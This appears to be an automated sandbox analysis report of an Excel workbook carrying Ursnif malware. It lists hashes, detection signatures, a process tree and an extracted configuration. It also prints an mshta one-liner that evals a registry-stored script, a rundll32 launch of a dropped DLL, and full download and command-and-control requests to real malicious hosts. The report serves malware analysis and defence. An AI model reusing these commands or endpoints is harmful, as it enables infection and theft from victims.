Loading ...

Play interactive tourEdit tour

Analysis Report File_78476.xlsb

Overview

General Information

Sample Name:File_78476.xlsb
Analysis ID:352546
MD5:77927a0a05cc284ca6e904563cf81f20
SHA1:0ffd8f1b079a75f143cd601d832e1a5e2f651818
SHA256:d46861839e12139c03aceef7f735426d794809344f18d8b2053377dcb1ebd470

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Searches for the Microsoft Outlook file path
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6696 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 7104 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 2288 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6024 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5748 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6336 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5428 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "226", "system": "53111af62e035434ff52895482ef7b78hhw", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613184313", "user": "f73be0088695dc15e71ab15c2aa7c3e0", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6696, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer, ProcessId: 7104

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: rundll32.exe.7104.1.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "226", "system": "53111af62e035434ff52895482ef7b78hhw", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613184313", "user": "f73be0088695dc15e71ab15c2aa7c3e0", "hash": "0xf857f57e", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 8%Perma Link
            Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
            Source: api10.laptok.atVirustotal: Detection: 10%Perma Link

            Compliance:

            barindex
            Uses new MSVCR DllsShow sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
            Uses secure TLS version for HTTPS connectionsShow sources
            Source: unknownHTTPS traffic detected: 162.241.169.26:443 -> 192.168.2.3:49731 version: TLS 1.2
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: c:\Campenergy\wouldShoulder\learnable\motion.pdb source: 11[1].dll.0.dr

            Software Vulnerabilities:

            barindex
            Document exploit detected (creates forbidden files)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\fsh\87.dllJump to behavior
            Document exploit detected (drops PE files)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 11[1].dll.0.drJump to dropped file
            Document exploit detected (UrlDownloadToFile)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: unknownTCP traffic detected without corresponding DNS query: 139.162.191.228
            Source: global trafficHTTP traffic detected: GET /campo/m/m HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 139.162.191.228Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07ZqQ_2BIY5i/gaJx2nrBRbCwokKD6i/TmP3yOyRd/UIWhx47302AAtFE31oP0/QH6kOp10Kt5yvTIaAYa/LK0GUog4M1OCTVMD4H5Cd4/y7Hidc3RQ475o/Nxk1_2FU/AOpYSuCaFqv8yJoz1d98uE0/RGNbcUJDfT/THwRpNZtVSPwcxLQu/JgOmTTbGBEY6/RAYX3HI935J/bkHevlKXRebACN/zYCEHnvaIKYWA35nI5OI7/Zng6uRiwb/9FNesaJS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/FnFXZRWsgaOv/P6JvZtKT1UO/agHdP9HeJ299dx/NjFG3Ft3KB32OuetXL2sT/DABW2CvkhTj1mHcu/d2rOfCnZM39ngVM/pgEkPfy7WZBHt2_2BI/8hIbLV9eh/Nxh_2BSaIH1v25_2Fy2g/jQtR51J9UQmW5hGZQSs/bUByYCCGCjlzccS8n_2Fr1/2TxpWMxaih6Zd/1FC2e6YZ/ytawmZHSR4fCdrk_2BuzGs2/I_2Fe7DGRd/nrzf8JbWsmL4ZMLw8/AiFgBOzN747U/qJ5myKX5wF4/23oTR339hxhZPv/OxZ3q5cF_2BQi5HeJCCQ3/czqNoTGtPyg5zMIR/bO5RZf4FOlJ/J HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0dYaBh2VTFZ3ie/AQvPNAeKAbUpEx_2BIA_2F/yqBcCuGKcxWU4/7_2FDUSL/tmEKyuvK3UnsOb7GxJhyB1v/eAgP5jhU7c/4LQdBuTq0iBob66eg/RKZ75u7U2Jkq/Bh_2B1mS8Vw/lDNXKg1S3Gc5QV/zwawyAQoh3ycAGCJJd6YY/crMtievOTWbq6IjA/LAnATbCyag_2Bwn/5yU0_2BoSAkzUKbcl_/2BAXWx8K4/WLBZv2PnGv5crOgJCyib/ZVr6kC0SezCKLbzs2jt/2ZOSFMw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/TsKcWE2WM/nJKmvtwztxYIvooVmlF8/f0GhZMHg0Zw5qyafREH/k8WCOuLk57UyBPUazjQh2Z/3S3ubdSMDgVaL/gAWRJwIA/ZCG7BHExQwWXeVA1UnuSBqn/i4n1PFTtlL/cwWi1gc5A_2Bt5DHa/KB0_2BLRegs0/BViXJpKwWgb/pjm_2BuXWxLo81/vWKBV9Fs7FvCc1nuX8q5n/wGeJRl_2FEvkYbfF/Pr91DmkaDab5rrv/0H_2FXSeTsgpPadA5E/E3CpLlb73/0qgYAbyOZODf4FqqEkA4/X5b8p4TRxQsXlnMDNwZ/TvAO43omBsbN/h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
            Source: unknownDNS traffic detected: queries for: cabogrupo.co.mz
            Source: unknownHTTP traffic detected: POST /api1/pmT_2FJ7yMpV_2FsxCGV/80ZJDlvhk5QH3DonF9p/gMZiDS0z2g2bNrJ_2Bv_2B/DXZEEWDxEnN_2/Bx7WHkRW/wpcaGRddIyctm9GWW0oCdyR/qDXQAt7J40/6ogNDJFenwl5gVncd/SbRM7SEjzx1B/lGa_2BU69FH/bDmPVUZABXfNqj/99lThSa0HHLaHhjsVvXGB/uCBX4Mj6I29IAbCC/UnujtjeNBz5OBuo/7XOr98uUHKNs6Ghu4C/k_2BIsFhF/UXse0hUo2oKU8zO8khsV/ZbPtcIIUg_2B2PD2b0Q/KHYH7l2X48hEAXFhsSFudS/huoP4e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Feb 2021 17:45:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: sheet9.binString found in binary or memory: http://139.162.191.228/campo/m/m.D
            Source: {7B42C275-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.dr, ~DF045C60B1D61D61DD.TMP.22.drString found in binary or memory: http://api10.laptok.at/api1/FnFXZRWsgaOv/P6JvZtKT1UO/agHdP9HeJ299dx/NjFG3Ft3KB32OuetXL2sT/DABW2CvkhT
            Source: ~DF78E812B899E938EF.TMP.22.dr, {7B42C273-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.drString found in binary or memory: http://api10.laptok.at/api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07Z
            Source: {7B42C277-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.drString found in binary or memory: http://api10.laptok.at/api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.aadrm.com/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.cortana.ai
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.office.net
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.onedrive.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://augloop.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://augloop.office.com/v2
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://cdn.entity.
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://clients.config.office.net/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://config.edge.skype.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://cortana.ai
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://cortana.ai/api
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://cr.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://dev.cortana.ai
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://directory.services.
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://graph.windows.net
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://graph.windows.net/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://lifecycle.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://login.windows.local
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://management.azure.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://management.azure.com/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://messaging.office.com/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://ncus-000.contentsync.
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://officeapps.live.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
